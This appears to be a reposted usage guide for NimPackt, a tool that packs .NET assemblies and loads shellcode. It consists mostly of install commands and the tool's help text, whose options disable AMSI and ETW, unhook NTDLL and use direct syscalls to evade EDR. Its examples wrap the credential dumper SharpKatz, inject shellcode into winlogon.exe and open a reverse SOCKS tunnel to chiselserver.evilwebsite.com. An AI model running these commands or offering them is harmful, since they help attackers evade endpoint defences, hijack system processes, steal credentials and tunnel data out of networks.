NimPackt:基于Nim的汇编程序封装器和Shellcode加载器

<pre class="brush:php;toolbar:false;">git clone https://github.com/chvancooten/NimPackt-v1.git

<pre class="brush:php;toolbar:false;">sudo apt install -y python3 mingw-w64 nimpip3 install pycryptodome argparsenimble install winim nimcrypto

<pre class="brush:php;toolbar:false;">nimble install winim nimcryptopip3 install pycryptodome argparse

<pre class="brush:php;toolbar:false;">docker run --rm -v `pwd`:/usr/src/np -w /usr/src/np chvancooten/nimbuild python3 NimPackt.py -e shinject -i sc.bin

<pre class="brush:php;toolbar:false;">usage: NimPackt.py [-h] -e EXECUTIONMODE -i INPUTFILE [-a ARGUMENTS] [-na] [-ne] [-r]                   [-t INJECTTARGET] [-E] [-o OUTPUTFILE] [-nu] [-ns] [-f FILETYPE] [-s] [-32] [-S]                   [-d] [-v] [-V]required arguments:  -e EXECUTIONMODE, --executionmode EXECUTIONMODE                        Execution mode of the packer. Supports "execute-assembly" or "shinject"  -i INPUTFILE, --inputfile INPUTFILE                        C# .NET binary executable (.exe) or shellcode (.bin) to wrapexecute-assembly arguments:  -a ARGUMENTS, --arguments ARGUMENTS                        Arguments to "bake into" the wrapped binary, or "PASSTHRU" to accept run-                        time arguments (default)  -na, --nopatchamsi    Do NOT patch (disable) the Anti-Malware Scan Interface (AMSI)  -ne, --nodisableetw   Do NOT disable Event Tracing for Windows (ETW)shinject arguments:  -r, --remote          Inject shellcode into remote process (default false)  -t INJECTTARGET, --target INJECTTARGET                        Remote thread targeted for remote process injection  -E, --existing        Remote inject into existing process rather than a newly spawned one (default                        false, implies -r) (WARNING: VOLATILE)other arguments:  -o OUTPUTFILE, --outfile OUTPUTFILE                        Filename of the output file (e.g. "LegitBinary"). Specify WITHOUT extension                        or path. This property will be stored in the output binary as the original                        filename  -nu, --nounhook       Do NOT unhook user-mode API hooks in the target process by loading a fresh                        NTDLL.dll  -ns, --nosyscalls     Do NOT use direct syscalls (Windows generation 7-10) instead of high-level                        APIs to evade EDR  -f FILETYPE, --filetype FILETYPE                        Filetype to compile ("exe" or "dll", default: "exe")  -s, --sleep           Sleep for approx. 30 seconds by calculating primes  -32, --32bit          Compile in 32-bit mode (untested)  -S, --showConsole     Show a console window with the app's output when running  -d, --debug           Enable debug mode (retains .nim source file in output folder)  -v, --verbose         Print debug messages of the wrapped binary at runtime  -V, --version         show program's version number and exit

<pre class="brush:php;toolbar:false;">python3 ./NimPackt.py -e execute-assembly -i bins/SharpKatz-x64.exe -S -v

<pre class="brush:php;toolbar:false;">python3 ./NimPackt.py -f dll -e execute-assembly -i Seatbelt.exe -a "-group=all -outputfile=c:\users\public\downloads\sb.txt"

<pre class="brush:php;toolbar:false;">python3 NimPackt.py -nu -na -ne -e execute-assembly -i bins/SharpChisel.exe -a 'client --keepalive 25s --max-retry-interval 25s https://chiselserver.evilwebsite.com R:10073:socks'

<pre class="brush:php;toolbar:false;">python3 NimPackt.py -i calc.bin -e shinject -f dll

<pre class="brush:php;toolbar:false;">python3 NimPackt.py -i calc.bin -e shinject -t "calc.exe"

<pre class="brush:php;toolbar:false;">python3 NimPackt.py -i calc.bin -e shinject -r -E -t "winlogon.exe" -nu -ns